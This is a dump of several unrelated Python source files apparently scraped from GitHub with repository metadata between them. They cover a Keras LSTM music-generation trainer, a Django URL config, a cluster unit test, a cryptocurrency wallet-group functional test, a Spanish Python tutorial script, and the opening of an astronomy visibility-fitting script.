batch_x=np.asarray(batch_x)
else:
batch_x=batch_x_midi
batch_y=batch_y_midi
return batch_x, batch_y
def on_epoch_end(self):
if self.shuffle == True:
np.random.shuffle(self.samples)
#self.batches=samples_to_batches(self.samples,self.batch_size)
class Data_Gen_Midi2(Sequence):
def __init__(self,notes, batch_size=64,seq_length=64, to_fit=True,shuffle=True, one_hot=True,dict=True,n_vocab=130):
#self.list_IDs = sorted(glob.glob(f"{batch_folder}/**/*.krn"))
self.samples=get_fsamples(notes,seq_length=seq_length)
#self.batches=samples_to_batches(self.samples,batch_size)
self.batch_size = batch_size
self.seq_length=seq_length
self.shuffle=shuffle
self.to_fit=to_fit
self.one_hot=one_hot
self.dict=dict
self.dictionary=keep_dataset_notes(notes)
self.n_vocab=n_vocab
def __len__(self):
# print(self.type + ' - len : ' + str(int(np.ceil(self.x.shape[0] / self.batch_size))))
return int(len(self.samples)/self.batch_size)
def __getitem__(self, idx):
batch=self.samples[self.batch_size*idx:self.batch_size*(idx+1)]
#batch=self.batches[idx]
batch_x_midi =np.array([batch[i][0:self.seq_length] for i in range(self.batch_size)])
batch_y_midi =np.array([batch[i][1:] for i in range(self.batch_size)])
if self.one_hot:
batch_x=[]
batch_y=[]
if self.dict:
for seq in batch_x_midi:
batch_x.append(midi_to_onehot_dict(seq,self.dictionary))
for seq in batch_y_midi:
batch_y.append(midi_to_onehot_dict(seq,self.dictionary))
else:
for seq in batch_x_midi:
batch_x.append(midi_to_onehot(seq,dim=self.n_vocab))
for seq in batch_y_midi:
batch_y.append(midi_to_onehot(seq,dim=self.n_vocab))
batch_x=np.asarray(batch_x)
batch_y=np.asarray(batch_y)
else:
batch_x=batch_x_midi
batch_y=batch_y_midi
return batch_x, batch_y
def on_epoch_end(self):
if self.shuffle == True:
np.random.shuffle(self.samples)
#self.batches=samples_to_batches(self.samples,self.batch_size)
class Data_Gen_Text(Sequence):
def __init__(self,text, batch_size=64,seq_length=64, to_fit=True,shuffle=True, one_hot=False,n_vocab=130,dictionary={}):
#self.list_IDs = sorted(glob.glob(f"{batch_folder}/**/*.krn"))
self.sentences=get_samples_text(text,seq_length)
print('nuber of sequences: ',len(self.sentences))
#self.batches=samples_to_batches2(self.sentences,batch_size)
self.batch_size = batch_size
self.seq_length=seq_length
self.shuffle=shuffle
chars = sorted(list(set(text)))
self.one_hot=one_hot
#self.dictionary=dict((c, i) for i, c in enumerate(chars))
self.dictionary=dictionary
self.n_vocab=n_vocab
def __len__(self):
# print(self.type + ' - len : ' + str(int(np.ceil(self.x.shape[0] / self.batch_size))))
return int(len(self.sentences)/self.batch_size)
def __getitem__(self, idx):
batch=self.sentences[self.batch_size*idx:self.batch_size*(idx+1)]
batch_x_text =[batch[i][0:self.seq_length] for i in range(self.batch_size)]
batch_y_text =[batch[i][1:] for i in range(self.batch_size)]
if self.one_hot:
batch_x=[]
batch_y=[]
for seq in batch_x_text:
batch_x.append(midi_to_onehot_dict(seq,self.dictionary))
for seq in batch_y_text:
batch_y.append(midi_to_onehot_dict(seq,self.dictionary))
batch_x=np.array(batch_x)
batch_y=np.array(batch_y)
else:
batch_x=[[self.dictionary[i] for i in batch_x_text[j]] for j in range(self.batch_size)]
batch_y=[[self.dictionary[i] for i in batch_y_text[j]] for j in range(self.batch_size)]
return np.array(batch_x),np.array( batch_y)
def on_epoch_end(self):
if self.shuffle == True:
np.random.shuffle(self.sentences)
#self.batches=samples_to_batches2(self.sentences,self.batch_size)
def get_notes(encoding,data_dir='data',file_extension='.krn',resolution=8,streams=False):
if not os.path.exists('notes'):
os.mkdir('notes')
path=data_dir+'/**/*'+file_extension
if encoding==1:
get_notes_midi1(path,resolution=resolution,streams=streams)
elif encoding==2:
get_notes_midi2(path,resolution=resolution,streams=streams)
elif encoding==3:
get_notes_midi5(path,resolution=resolution,streams=streams)
elif encoding==4:
get_notes_event1(path,resolution=resolution,streams=streams)
def pretrain(notes_path,batch_size=256,seq_length=64,desc='',val_split=0.1, all_notes=False):
notes=pd.read_pickle(notes_path)
if all_notes:
nnotes=add_piece_start_stop(notes)
notes=glue_notes(nnotes)
batch_folder=f'batches/sl{seq_length}_bs{batch_size}'+'_'+desc
try:
os.makedirs(batch_folder, exist_ok=True)
os.makedirs(batch_folder+'/train', exist_ok=True)
os.makedirs(batch_folder+'/validate', exist_ok=True)
except:
print('Batch folder already exists')
durations=np.empty(0)
for piece in notes:
durations=np.append(durations,piece.shape[0])
#notes=np.array(notes)
inds=durations.argsort()
durations=durations[inds]
notes_sorted=notes[inds]
notes=notes_sorted[durations>64]
np.random.shuffle(notes)
notes_train=notes[0:len(notes)-int(val_split*len(notes))]
notes_validate=notes[len(notes)-int(val_split*len(notes)):len(notes)]
preprocess(notes_train,batch_folder=batch_folder+'/train',sequence_length=seq_length,batch_size=batch_size)
preprocess(notes_validate,batch_folder=batch_folder+'/validate',sequence_length=seq_length,batch_size=batch_size)
return batch_folder
def train_with_loader(batch_folder='npz',load=False,model_path='',desc='',dict=True):
#date to be used for archiving model and training history
date=datetime.datetime.utcnow()
gdate=date.astimezone(pytz.timezone('Europe/Athens'))
fdate=gdate.strftime('%d-%m-%y %H:%M')
fday=gdate.strftime('%d-%m-%y')
ftime=gdate.strftime('%H_%M')
print( fday)
print(ftime)
#os.mkdir('/experiments/{fday}')
#os.mkdir('/experiments/{fday}/{ftime} - {desc}')
experiment_path='experiments/'+fday+'/'+ftime+' - '+desc
os.makedirs(experiment_path+'/models')
logdir=experiment_path+'/logs'
os.makedirs(experiment_path+'/models',exist_ok=True)
input_shape=np.load(f'{batch_folder}/train/input_shape.npy')
batch_size=input_shape[0]
n_vocab=130
train_loader=Data_Gen_Midi(batch_folder=batch_folder+'/train',batch_size=batch_size,shuffle=True,n_vocab=n_vocab,dict=dict)
val_loader=Data_Gen_Midi(batch_folder=batch_folder+'/validate',batch_size=batch_size,shuffle=True,n_vocab=n_vocab,dict=dict)
if dict:
tdict=train_loader.dictionary
vdict=val_loader.dictionary
tdict.update(vdict)
val_loader.dictionary=tdict
dictionary=tdict
n_vocab=len(dictionary)
input_shape[2]=n_vocab
with open(experiment_path+'/dictionary', 'wb') as filepath:
pickle.dump(dictionary, filepath)
if load:
model=load_model(model_path)
else:
model=create_simple_network_func(input_shape,n_vocab=n_vocab)
filepath = os.path.abspath(experiment_path+'/models/model-{epoch:03d}-{loss:.4f}-{val_loss:.4f}')
checkpoint = ModelCheckpoint(
filepath,
save_weights_only=False,
period=10, #Every 10 epochs
monitor='loss',
verbose=2,
save_best_only=False,
mode='min'
)
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1,
patience=5, min_lr=0.000001)
plot_losses=TrainingPlot()
callbacks_list = [checkpoint,plot_losses]
herstory=model.fit(train_loader,validation_data=val_loader,initial_epoch=0, epochs=200, callbacks=callbacks_list)
with open(experiment_path+'/history', 'wb') as filepath:
pickle.dump(herstory, filepath)
return herstory
def train_with_loader2(notes_path,batch_size,seq_length,load=False,all_notes=False,model_path='',desc='',dict=True,lstm_size=32,lstm_no=1,dropout=0.2,learning_rate=0.001):
#date to be used for archiving model and training history
date=datetime.datetime.utcnow()
gdate=date.astimezone(pytz.timezone('Europe/Athens'))
fdate=gdate.strftime('%d-%m-%y %H:%M')
fday=gdate.strftime('%d-%m-%y')
ftime=gdate.strftime('%H_%M')
print( fday)
print(ftime)
#os.mkdir('/experiments/{fday}')
#os.mkdir('/experiments/{fday}/{ftime} - {desc}')
notes_name=os.path.basename(notes_path)
notes=pd.read_pickle(notes_path)
notes=notes[0:int(len(notes)/10)]
notes=add_piece_start_stop(notes)
print('Notes read')
if all_notes:
notes=glue_notes(notes,add_marks=True)
print('Notes glued')
model_info=f'_model_n{lstm_no}_s{lstm_size}_d{dropout}_sl{seq_length}_bs{batch_size}'
experiment_path=os.path.join('experiments',fday,notes_name+model_info,'')
logdir=os.path.join(experiment_path,'logs','')
os.makedirs(experiment_path+'/models',exist_ok=True)
os.makedirs(experiment_path+'/logs',exist_ok=True)
input_shape=np.array([batch_size,seq_length,130])
n_vocab=130
val_split=0.1
notes_train=notes[0:len(notes)-int(val_split*len(notes))]
notes_validate=notes[len(notes)-int(val_split*len(notes)):len(notes)]
train_loader=Data_Gen_Midi2(notes_train,batch_size=batch_size,seq_length=seq_length,shuffle=True,n_vocab=n_vocab,dict=dict)
val_loader=Data_Gen_Midi2(notes_validate,batch_size=batch_size,seq_length=seq_length,shuffle=True,n_vocab=n_vocab,dict=dict)
if dict:
tdict=train_loader.dictionary
vdict=val_loader.dictionary
tdict.update(vdict)
val_loader.dictionary=tdict
dictionary=tdict
n_vocab=len(dictionary)
input_shape[2]=n_vocab
with open(experiment_path+'/dictionary', 'wb') as filepath:
pickle.dump(dictionary, filepath)
if load:
model=load_model(model_path)
else:
#model=create_simple_network_func(input_shape,n_vocab=n_vocab,lstm_size=lstm_size)
model=build_model2(input_shape[0], input_shape[1], n_vocab, lstm_no=lstm_no,lstm_size=lstm_size,dropout_rate=dropout)
optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate)
model.compile(loss='categorical_crossentropy', optimizer=optimizer,metrics=['accuracy'])
model.summary()
filepath = os.path.abspath(experiment_path+'/models/model-{epoch:03d}-{loss:.4f}-{val_loss:.4f}')
checkpoint = ModelCheckpoint(
filepath,
save_weights_only=False,
period=2, #Every 10 epochs
monitor='loss',
verbose=2,
save_best_only=False,
mode='min'
)
#define callbacks
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1,
patience=5, min_lr=0.000001)
#plot_losses=TrainingPlot()
csvlog=tf.keras.callbacks.CSVLogger(experiment_path+'/logs.csv', separator=",", append=False)
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir = logdir,
histogram_freq = 1)
callbacks_list = [checkpoint,csvlog,tensorboard_callback]
model.fit(train_loader,validation_data=val_loader,initial_epoch=0, epochs=200, callbacks=callbacks_list)
def train_stateful(notes_path,batch_size,seq_length,load=False,all_notes=False,model_path='',desc='',dict=True,lstm_size=32,lstm_no=1,dropout=0.2):
notes_name=os.path.basename(notes_path)
notes=pd.read_pickle(notes_path)
notes=glue_notes(notes,add_marks=True)
dictionary=keep_dataset_notes(notes)
n_vocab=len(dictionary)
input_shape[2]=n_vocab
with open(experiment_path+'/dictionary', 'wb') as filepath:
pickle.dump(dictionary, filepath)
input_shape=np.array([batch_size,seq_length,n_vocab])
samples=get_fsamples(notes,seq_length=seq_length)
network_input=np.reshape(samples,(len(samples),seq_length,n_vocab))
if load:
model=load_model(model_path)
else:
#model=create_simple_network_func(input_shape,n_vocab=n_vocab,lstm_size=lstm_size)
model=build_state_model(input_shape[0], input_shape[1], n_vocab, lstm_no=lstm_no,lstm_size=lstm_size,dropout_rate=dropout)
optimizer=tf.keras.optimizers.Adam(learning_rate=0.001)
model.compile(loss='categorical_crossentropy', optimizer=optimizer,metrics=['accuracy'])
model.fit(network_input,initial_epoch=0, epochs=200)
def train_text(text_path,batch_size,seq_length,load=False,model_path='',lstm_no=1,lstm_size=32,dropout=0.2,epochs=200):
#date to be used for archiving model and training history
date=datetime.datetime.utcnow()
gdate=date.astimezone(pytz.timezone('Europe/Athens'))
fdate=gdate.strftime('%d-%m-%y %H:%M')
fday=gdate.strftime('%d-%m-%y')
ftime=gdate.strftime('%H_%M')
print( fday)
print(ftime)
model_info=f'_model_n{lstm_no}_s{lstm_size}_d{dropout}_sl{seq_length}_bs{batch_size}'
text_name=os.path.basename(text_path)
experiment_path=os.path.join('experiments',fday,text_name+model_info,'')
logdir=os.path.join(experiment_path,'logs','')
os.makedirs(experiment_path+'/models',exist_ok=True)
os.makedirs(experiment_path+'/logs',exist_ok=True)
text=load_doc(text_path)
text=text[0:int(len(text)/4)]
text=text.split()
val_split=0.3
text_train=text[0:len(text)-int(val_split*len(text))]
text_validate=text[len(text)-int(val_split*len(text)):len(text)]
chars = sorted(list(set(text)))
print('total chars:', len(chars))
n_vocab=len(chars)
char_indices = dict((c, i) for i, c in enumerate(chars))
indices_char = dict((i, c) for i, c in enumerate(chars))
# cut the text in semi-redundant sequences of seq_length characters
train_loader=Data_Gen_Text(text_train,batch_size=batch_size,seq_length=seq_length,n_vocab=n_vocab,dictionary=char_indices)
val_loader=Data_Gen_Text(text_validate,batch_size=batch_size,seq_length=seq_length,n_vocab=n_vocab,dictionary=char_indices)
tdict=train_loader.dictionary
vdict=val_loader.dictionary
tdict.update(vdict)
val_loader.dictionary=tdict
dictionary=tdict
n_vocab=len(dictionary)
with open(experiment_path+'/dictionary', 'wb') as filepath:
pickle.dump(dictionary, filepath)
def on_epoch_end(epoch, _):
# Function invoked at end of each epoch. Prints generated text.
print()
print('----- Generating text after Epoch: %d' % epoch)
start_index = random.randint(0, len(text) - seq_length - 1)
for diversity in [0.2, 0.5, 1.0, 1.2]:
print('----- diversity:', diversity)
generated = ''
sentence = text[start_index: start_index + seq_length]
generated += sentence
print('----- Generating with seed: "' + sentence + '"')
sys.stdout.write(generated)
for i in range(400):
x_pred = np.zeros((1, seq_length, len(chars)))
for t, char in enumerate(sentence):
x_pred[0, t, char_indices[char]] = 1.
preds = model.predict(x_pred, verbose=0)[0]
next_index = sample(preds, diversity)
next_char = indices_char[next_index]
sentence = sentence[1:] + next_char
sys.stdout.write(next_char)
sys.stdout.flush()
print()
print_callback = LambdaCallback(on_epoch_end=on_epoch_end)
filepath = os.path.abspath(experiment_path+'/models/model-{epoch:03d}-{loss:.4f}-{val_loss:.4f}')
checkpoint = ModelCheckpoint(
filepath,
save_weights_only=False,
period=2, #Every 10 epochs
monitor='loss',
verbose=2,
save_best_only=False,
mode='min'
)
# learning rate scheduler
def schedule(epoch):
if epoch < 5:
new_lr = .003
elif epoch >= 5:
new_lr = 0.003 * (epoch-4) ** 0.97
print("\nLR at epoch {} = {} \n".format(epoch,new_lr))
return new_lr
lr_scheduler = tf.keras.callbacks.LearningRateScheduler(schedule)
csvlog=tf.keras.callbacks.CSVLogger(experiment_path+'/logs.csv', separator=",", append=False)
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir = logdir,
histogram_freq = 1,
profile_batch = '2,200')
callbacks_list=[checkpoint,tensorboard_callback,csvlog,lr_scheduler]
model=build_model2(batch_size, seq_length, n_vocab,lstm_size=lstm_size,lstm_no=lstm_no,dropout_rate=dropout)
optimizer=tf.keras.optimizers.Adam(learning_rate=0.001)
model.compile(loss='categorical_crossentropy', optimizer=optimizer,metrics=['accuracy'])
model.summary()
model.fit(train_loader,validation_data=val_loader,initial_epoch=0, epochs=epochs,callbacks=callbacks_list)
#%%
if __name__=='__main__':
notes_path='notes/notes_tstep1_res8'
res=8
enc=1
batch_size=256
seq_length=64
train_with_loader2(notes_path, batch_size, seq_length,lstm_no=2,lstm_size=64,dropout=0.5,all_notes=False)
'''
if __name__=='__main__':
#get_kern_text('data1','kern_text.txt')
#removeComments('kern_text.txt', 'kern_text_nocomment.txt')
text_path='data_v3_startstop'
train_text(text_path,256,64,lstm_no=1,lstm_size=32,dropout=0.2,epochs=100)
#train_text(text_path,64,50,lstm_no=3,lstm_size=512,dropout=0.5,epochs=100)
''' | [
"38662795+manosplitsis@users.noreply.github.com"
] | 38662795+manosplitsis@users.noreply.github.com |
4c34db92bf6e3b3781c4e90afde099476207f044 | d13c8a468edbcdd890d1cd797200528913f3d501 | /restful_project/restful_project/urls.py | fb63b0b9cdca52b877bf0f8c0d4cf64ce720352a | [] | no_license | MarjoHysaj/Semi-Restful-Validation | 78e4516db506c7e1381978252fedfee98abdb504 | 92a88df3243d61aa5be9d34253ecdceb92df6962 | refs/heads/main | 2023-04-15T00:55:50.336475 | 2021-04-21T17:58:00 | 2021-04-21T17:58:00 | 360,247,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | """restful_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
urlpatterns = [
#path('admin/', admin.site.urls),
path('',include('restful_app.urls'))
]
| [
"mariohysaj@gmail.com"
] | mariohysaj@gmail.com |
2eed8db45422d9c88538efb423a9a4754c1887e2 | 3a21faa925e8a21ad5e0d6dedf3037cc52750cbd | /datasciencebox/tests/test_cluster.py | 89b93a7e9fa3876d1158ec3b5b928d7a7a92c6fe | [
"Apache-2.0"
] | permissive | yabebalFantaye/datasciencebox | 9e630f9ad9139a609d9d925ce4a3f29467bf661f | 9f57ae85a034357d5bc15a12f3ebd15930f33ff1 | refs/heads/master | 2021-01-15T18:14:01.730969 | 2015-09-06T05:42:23 | 2015-09-06T05:42:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | import pytest
from datasciencebox.core.settings import Settings
from datasciencebox.core.cloud.cluster import Cluster
settings = Settings()
def test_cluster_from_to_list():
data = [{'id': 0, 'ip': '0.0.0.0'}, {'id': 1, 'ip': '1.1.1.1'}, {'id': 2, 'ip': '2.2.2.2'}]
cluster = Cluster.from_list(data, settings)
exported = cluster.to_list()
exported_ans = [{'id': 0,
'ip': '0.0.0.0'}, {'id': 1,
'ip': '1.1.1.1'}, {'id': 2,
'ip': '2.2.2.2'}]
assert isinstance(exported, list)
assert exported == exported_ans
assert len(cluster.instances) == 3
| [
"df.rodriguez143@gmail.com"
] | df.rodriguez143@gmail.com |
887f12f66788462a12d4ec5db7d2ecc742a147d3 | d37c7221cbcc410c08cdf66c11a36e29d2e5646b | /test/functional/wallet_groups.py | 2e410a0df45227e7dd62096a9ab7fea29d5e31b1 | [
"MIT"
] | permissive | pigycoin-project/pigycoin | 21e59a3c308cbe984fbd1f2c4dffd7508745e182 | 7b48eaa19d65b52f6d5bac0b40391bec93f0f62f | refs/heads/master | 2021-01-15T02:53:47.761729 | 2020-04-30T08:01:43 | 2020-04-30T08:01:43 | 244,434,555 | 2 | 3 | MIT | 2020-04-30T08:01:45 | 2020-03-02T17:39:05 | C++ | UTF-8 | Python | false | false | 3,929 | py | #!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test wallet group functionality."""
from test_framework.test_framework import PigycoinTestFramework
from test_framework.messages import CTransaction, FromHex, ToHex
from test_framework.util import (
assert_equal,
)
def assert_approx(v, vexp, vspan=0.00001):
if v < vexp - vspan:
raise AssertionError("%s < [%s..%s]" % (str(v), str(vexp - vspan), str(vexp + vspan)))
if v > vexp + vspan:
raise AssertionError("%s > [%s..%s]" % (str(v), str(vexp - vspan), str(vexp + vspan)))
class WalletGroupTest(PigycoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [[], [], ['-avoidpartialspends']]
self.rpc_timewait = 120
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
# Mine some coins
self.nodes[0].generate(110)
# Get some addresses from the two nodes
addr1 = [self.nodes[1].getnewaddress() for i in range(3)]
addr2 = [self.nodes[2].getnewaddress() for i in range(3)]
addrs = addr1 + addr2
# Send 1 + 0.5 coin to each address
[self.nodes[0].sendtoaddress(addr, 1.0) for addr in addrs]
[self.nodes[0].sendtoaddress(addr, 0.5) for addr in addrs]
self.nodes[0].generate(1)
self.sync_all()
# For each node, send 0.2 coins back to 0;
# - node[1] should pick one 0.5 UTXO and leave the rest
# - node[2] should pick one (1.0 + 0.5) UTXO group corresponding to a
# given address, and leave the rest
txid1 = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 0.2)
tx1 = self.nodes[1].getrawtransaction(txid1, True)
# txid1 should have 1 input and 2 outputs
assert_equal(1, len(tx1["vin"]))
assert_equal(2, len(tx1["vout"]))
# one output should be 0.2, the other should be ~0.3
v = [vout["value"] for vout in tx1["vout"]]
v.sort()
assert_approx(v[0], 0.2)
assert_approx(v[1], 0.3, 0.001)
txid2 = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), 0.2)
tx2 = self.nodes[2].getrawtransaction(txid2, True)
# txid2 should have 2 inputs and 2 outputs
assert_equal(2, len(tx2["vin"]))
assert_equal(2, len(tx2["vout"]))
# one output should be 0.2, the other should be ~1.3
v = [vout["value"] for vout in tx2["vout"]]
v.sort()
assert_approx(v[0], 0.2)
assert_approx(v[1], 1.3, 0.001)
# Empty out node2's wallet
self.nodes[2].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=self.nodes[2].getbalance(), subtractfeefromamount=True)
self.sync_all()
self.nodes[0].generate(1)
# Fill node2's wallet with 10000 outputs corresponding to the same
# scriptPubKey
for i in range(5):
raw_tx = self.nodes[0].createrawtransaction([{"txid":"0"*64, "vout":0}], [{addr2[0]: 0.05}])
tx = FromHex(CTransaction(), raw_tx)
tx.vin = []
tx.vout = [tx.vout[0]] * 2000
funded_tx = self.nodes[0].fundrawtransaction(ToHex(tx))
signed_tx = self.nodes[0].signrawtransactionwithwallet(funded_tx['hex'])
self.nodes[0].sendrawtransaction(signed_tx['hex'])
self.nodes[0].generate(1)
self.sync_all()
# Check that we can create a transaction that only requires ~100 of our
# utxos, without pulling in all outputs and creating a transaction that
# is way too big.
assert self.nodes[2].sendtoaddress(address=addr2[0], amount=5)
if __name__ == '__main__':
WalletGroupTest().main ()
| [
"61416421+pigycoin-project@users.noreply.github.com"
] | 61416421+pigycoin-project@users.noreply.github.com |
6e21f862d7e958f80ed264d9ffd7489494b638db | d9f52125601ec26f79202f0e912891b31b60ffc4 | /오후반/Sets/3_Set_union_Operation/3_Set_union_Operation_LGY.py | c79cb4088243b817c276b33d76d8101e5cfec87e | [] | no_license | YoungGaLee/2020_Python_coding-study | 5a4f36a39021c89ac773a3a7878c44bf8b0b811f | b876aabc747709afa21035c3afa7e3f7ee01b26a | refs/heads/master | 2022-12-12T13:34:44.729245 | 2020-09-07T04:07:48 | 2020-09-07T04:07:48 | 280,745,587 | 4 | 4 | null | 2020-07-22T03:27:22 | 2020-07-18T21:51:40 | Python | UTF-8 | Python | false | false | 135 | py | first = int(input())
A = set(input().split())
second = int(input())
B = set(input().split())
result = A.union(B)
print(len(result))
| [
"noreply@github.com"
] | YoungGaLee.noreply@github.com |
5fbc2ca52f2ffacd44d3d102faa15704d96af991 | e72d0aefcd47d8415ab498cc0dc46dc58d5a08c9 | /Profesional de BackEnd/1. Introduccion a Python y Django/Aprende Python y preparate para Django.py | e738a0a027c0b42b5e707a849934afe7a3e2e7be | [] | no_license | ivanmiranda/Mejorandola | 897c1fc8957c31df4c30533c91a9dd2d22c77bfe | b816beda385e05a50b74d7c9936079b28553ee18 | refs/heads/master | 2021-01-15T12:50:29.814094 | 2015-10-13T20:00:57 | 2015-10-13T20:00:57 | 43,966,540 | 0 | 0 | null | 2015-10-09T16:11:23 | 2015-10-09T16:11:23 | null | UTF-8 | Python | false | false | 3,984 | py | #-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: juan.flores
#
# Created: 07/01/2015
# Copyright: (c) juan.flores 2015
# Licence: <your licence>
#-------------------------------------------------------------------------------
# Regresando en el minuto 32
L=[22, True, "una lista",[1,2]]
lista = [1,7,4,9,-10,-7,5,0]
sorted(lista, reverse=True)
sorted(lista)
string="Esto es una cadena"
type(string)
diccionario = {'a' : 1, 'b' : 2, 'c' : 3, 'd' : 4}
diccionario2 = {'a' : 4, 'b' : 10, 'c' : 1, 'd' : -4}
sorted(diccionario2.items(), key=lambda x: x[1])
lista_dict = [{'item': 'cafe', 'valor':3},{'item':'azucar', 'valor':1},{'item':'pan', 'valor':5}]
sorted(lista_dict, key=lambda x: x['valor'])
print 'Contenido en string', string, ' y en lista', L
len(string)
len(L)
a, b, c = [1, 2, 3]
for l in L:
print l
for d in diccionario:
print d
for key, value in diccionario.items():
print 'key:', key, 'value:', value
print diccionario.items()
def my_first_function():
return "Hello World"
nombres = ['harvey', 'cursos', 'ventas']
emails = ['h@mejorando.la', 'cursos@mejorando.la', 'ventas@mejorando.la']
for n, e in zip(nombres, emails):
print 'nombre', n, 'email', e
print zip(nombres, emails)
print dict(zip(nombres, emails))
print lista
positivos = list()
for l in lista:
if l > 0:
positivos.append(l)
print positivos
positivos2 = []
positivos2 = [l for l in lista if l > 0]
print positivos2
pares = [{k: v} for k, v in diccionario2.items() if v%2 == 0]
print diccionario2
print pares
lista1 = [1,2,3,4]
lista2 = [3,4,5,6]
lista3 = [1,2,3,7,8,9,1,5,4,3,1]
print set(lista1) - set(lista2)
print set(lista2) - set(lista1)
print set(lista2) & set(lista1)
print set(lista2) | set(lista1)
print set(lista3)
print lista3
lista3 = list(set(lista3))
print lista3
print string
print string[0:6]
print string[:6]
print string[3:]
print lista
print lista[:4]
print lista[-4:]
print lista[::2]
print string[::3]
print lista
print lista[0]
del lista[0]
print lista[0]
print diccionario
del diccionario['c']
print diccionario
hoy = 'Hoy es 2015/12/01'
import re
print hoy
print re.sub(r'(\d+)/(\d+)/(\d+)', r'\3-\2-\1', hoy)
cadena = '{}: The Dark {}'
print cadena
print cadena.format('Carlos', 'Cow')
cadena = '{name}: The Dark {thing}'
print cadena
print cadena.format(name='Carlos', thing='Cow')
print cadena.format(thing='Cow', name='Carlos')
data = {'name': 'Carlos', 'thing': 'Cow'}
print cadena.format(**data)
print '%s: The Dark %s' % ('Carlos', 'Cow')
def func():
return 'Funcion'
print func()
def func(name, thing):
return '{name}: The Dark {thing}'.format(name=name, thing=thing)
print func('Carlos', 'Cow')
def func(*args, **kwargs):
print 'args', args
print 'kwargs', kwargs
print func('Carlos', 'Cow')
print func(name='Carlos', thing='Cow')
def func(*args, **kwargs):
print 'args', args
print 'kwargs', kwargs
if args:
return '{}: The Dark {}'.format(*args)
elif kwargs:
return '{name}: The Dark {thing}'.format(**kwargs)
else:
return 'Nothing'
print func()
print func('Carlos', 'Cow')
print func(name='Carlos', thing='Cow')
class Curso():
nombre = 'BackEnd'
profesor = 'Harvey'
c = Curso()
print c.nombre
print c.profesor
d = Curso()
print d.nombre
print d.profesor
class Curso():
def __init__(self, nombre, profesor):
self.nombre = nombre
self.profesor = profesor
c = Curso('FrontEnd', 'Leonidas')
print c
print c.nombre
print c.profesor
f = Curso('Backend', 'Harvey')
print f
print f.nombre
print f.profesor
class Curso():
def __init__(self, nombre, profesor):
self.nombre = nombre
self.profesor = profesor
def info(self):
return 'Esta es la clase 1 de {nombre} dictada por {profesor}'.format(nombre=self.nombre, profesor=self.profesor)
f = Curso('FrontEnd', 'Leonidas')
print f.info() | [
"juancfg_18@hotmail.com"
] | juancfg_18@hotmail.com |
eb328cba66a56a3747879cc13c2291de128fccc0 | 732d723fd09516b87a9e38f2698abd5ae58a8df7 | /fit_Mdyn/run_fit_V892Tau.py | 0f3636677ed8932c9afa41d721140286e8ebb9ee | [
"MIT"
] | permissive | vegajustin26/dyn-masses | d9244af48ee680dd9ac3523e5e79512f1163c766 | 9ff73fcec53beac59557c95fb1e47dc22947a333 | refs/heads/master | 2023-02-13T04:00:16.032224 | 2021-01-16T19:55:36 | 2021-01-16T19:55:36 | 277,567,969 | 0 | 0 | MIT | 2020-07-06T14:41:50 | 2020-07-06T14:41:50 | null | UTF-8 | Python | false | false | 10,294 | py | import os, sys, time
import numpy as np
import copy as copy
import scipy.constants as sc
from astropy.io import fits
from cube_parser import cube_parser
from vis_sample import vis_sample
from vis_sample.file_handling import import_data_uvfits
from scipy.ndimage import convolve1d
from scipy.interpolate import interp1d
import emcee
from multiprocessing import Pool
os.environ["OMP_NUM_THREADS"] = "1"
### FILE LOADING FROM SERVER
### -------------------------
# working_dir = '/Users/justinvega/Documents/GitHub/dyn-masses/fit_Mdyn/'
# filename_fits = 'V892Tau_data.uvfits'
# filename_npz = 'V892Tau.freq_conversions.npz'
# wwwfits = 'https://www.cfa.harvard.edu/~sandrews/data/'
#
# import urllib.request
# if not os.path.isdir(working_dir+'fake_data/data_uvfits/'):
# os.mkdir(working_dir+'fake_data/data_uvfits/')
# if not os.path.exists(working_dir+'fake_data/data_uvfits/'+filename_fits):
# print('Downloading UVFits...19 MB')
# urllib.request.urlretrieve(wwwfits+filename_fits, working_dir+'fake_data/data_uvfits/'+filename_fits)
# if not os.path.exists(working_dir+'fake_data/data_uvfits/'+filename_npz):
# print('Downloading Freq Conversions...32 K')
# urllib.request.urlretrieve(wwwfits+filename_npz, 'fake_data/data_uvfits/'+filename_npz)
### ASSIGN DATA TO FIT
### ------------------
# locate data
datadir = 'fake_data/data_uvfits/'
datafile = 'V892Tau_data'
suffix = '_posinc'
# velocity range to fit
vlo, vhi = -7., 23. # low and high LSRK velocities to fit [km/s]
vclo, vchi = 6.32, 8.24
# --> censored ranges should go here too
# spectral line information
nu_l = 230.538e9 # rest frequency of line [Hz]
# spectral signal processing
chbin = 2 # number of channels for binned averaging
chpad = 3 # number of channels to pad for SRF convolution
############
### CONSTANTS
### ---------
c_ = 2.99792e8 # speed of light [m/s]
### PROCESS DATA
### ------------
# load data visibilities with native channel spacings (LSRK)
data = import_data_uvfits(datadir+datafile+'.uvfits')
# extract the native channel frequencies, convert to LSRK velocities [m/s]
hdr = fits.open(datadir+datafile+'.uvfits')[0].header
freq0, idx0, nchan = hdr['CRVAL4'], hdr['CRPIX4'], hdr['NAXIS4']
data.freqs = freq0 + (np.arange(nchan) - idx0 + 1) * hdr['CDELT4']
vlsrk_native = c_ * (1. - data.freqs / nu_l)
# identify the subset of channel indices in the desired velocity range
